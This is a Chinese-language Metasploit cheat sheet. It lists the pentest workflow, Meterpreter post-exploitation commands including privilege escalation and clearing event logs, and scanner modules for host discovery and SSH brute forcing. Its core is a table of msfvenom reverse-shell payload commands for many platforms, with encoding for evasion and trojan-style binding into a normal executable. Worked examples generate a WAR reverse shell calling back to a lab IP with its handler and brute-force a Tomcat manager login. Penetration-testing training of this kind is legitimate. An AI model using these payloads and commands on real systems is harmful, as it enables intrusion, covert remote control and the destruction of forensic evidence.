Metasploit-Base-1

Meatasploit 基础操作

MSF 渗透流程(自上而下)

序号 命令 说明
search 模块 根据收集的信息搜索
info 模块名 查看模块信息
use 模块名 选择模块
show payloads 查看可以使用的攻击载荷
set payload 设置攻击载荷
show targets 查看攻击目标信息
show options/advance 查看基本参数和高级参数
set name 设置参数值
exploit/run 执行攻击
session -l 列出会话
session -i Id 切换到指定会话

MSF 基本命令

命令 说明
msfconsole 启动终端
banner 展示 banner
help /? 查看帮助, help + 命令
search 搜索漏洞和利用数据库
info 查看模块的信息
use 使用模块
show options 查看所使用模块需要配置的参数
set 设置参数值
run/exploit 执行模块
back 退回到主界面
quit/exit 退出 msf

核心模块说明

模块名 作用
Exploits 利用模块
Payloads 攻击载荷模块
Auxiliary 辅助模块
Post 后渗透模块
Encoders 编码模块
Evasion 免杀模块 (没什么暖用)
Nops 空模块

Meterpreter 中常用命令(这时你已经连上了 靶机)

命令 说明
sysinfo 查看目标机系统信息
getuid 查看用户
pwd/getIwd 查看当前目录
cd/Icd 切换目录
background 把当前会话放到后台
sessions -i id 切换到指定会话
sessions -k id 杀死指定会话
shell 进入目标主机 shell
upload file 向目标主机上传文件
download file 从目标主机下载文件
search 在目标主机上搜索文件 search -f test
execute 在目标主机执行程序 execute -H -i -f cmd.exe
getsystem 提权
clearev 清楚痕迹

MSF 信息收集常用模块

作用 命令
主机发现 use auxiliary/scanner/discovery/arp_sweep
端口扫描 use auxiliary/scanner/portscan/tcp
目录扫描 use auxiliary/scanner/http/dir_scanner
SSH爆破 use auxiliary/scanner/ssh/ssh_login
mysql 服务发现 use auxiliary/scanner/mysql/mysql_version
smb 服务发现 use auxiliary/scancer/smb/smb_version
telnet 服务发现 use auxiliary/scanner/telnet/telnet_version
rdp 服务发现 use auxiliary/scanner/rdp/rdp_scanner

反弹 shell 相关

常用的反弹 shell

相关程序利用 命令
普通生成 msfvenom -p windows/meterpreter/reverse_tcp -f exe -o C:\back.exe
编码处理型 msfvenom -p windows/meterpreter/reverse_tcp -i3 -e x86/shikata_ga_nai -f exe -o C:\back.exe
捆绑 msfvenom -p windows/meterpreter/reverse tcp -platform windows -a x86 -x C:\nomal.exe -k -f exe -o C:\shell.exe
Windows msfvenom -platform windows -a x86 -p windows/x64/meterpreter/reverse_tcp -f exe -o C:\back.exe
Linux msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST= LPORT= -f elf > shell.elf
MAC msfvenom -p osx/x86/shell_reverse_tcp LHOST= LPORT= -f macho > shell.macho
PHP msfvenom -p php/meterpreter_reverse_tcp LHOST= LPORT= -f raw > shell.php
Asp msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f asp > shell.asp
Aspx msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f aspx > shell.aspx
JSP msfvenom -p java/jsp_shell reverse_tcp LHOST= LPORT= -f raw > shell.jsp
War msfvenom -p java/jsp_shell reverse_tcp LHOST= LPORT= -f war > shell.war
Bash msfvenom -p cmd/unix/reverse_bash LHOST= LPORT= -f raw > shell.sh
Perl msfvenom -p cmd/unix/reverse_perl LHOST= LPORT= -f raw > shell.pl
Python msfvenom -p python/meterpreter/reverser_tcp LHOST=LPORT= -f raw > shell.py

反弹 shell 的利用案例

metasploit 外 使用 msfvenom 命令生成 反弹 shell 文件

1
msfvenom -p java/meterpreter/reverse_tcp lhost=192.168.142.132 lport=4444 -f war -o kali.war

metasploit 中利用

1
2
3
4
5
6
use exploit/multi/handler
show options
set payload java/meterpreter/reverse_tcp
set LHOST 192.168.142.132
set LPORT 4444
exploit

metasploit 脚本使用案例

tomcat 密码爆破

1
2
3
4
5
6
7
8
use auxiliary/scanner/http/tomcat_mgr_login
show option
sset RHOSTS 192.168.142.147
set THREADS 5
set BRUTEFORCE SPEED 3
show options
exploit

Contents
  1. 1. Meatasploit 基础操作
    1. 1.1. MSF 渗透流程(自上而下)
    2. 1.2. MSF 基本命令
    3. 1.3. 核心模块说明
    4. 1.4. Meterpreter 中常用命令(这时你已经连上了 靶机)
    5. 1.5. MSF 信息收集常用模块
    6. 1.6. 反弹 shell 相关
      1. 1.6.1. 常用的反弹 shell
      2. 1.6.2. 反弹 shell 的利用案例
    7. 1.7. metasploit 脚本使用案例
      1. 1.7.1. tomcat 密码爆破
|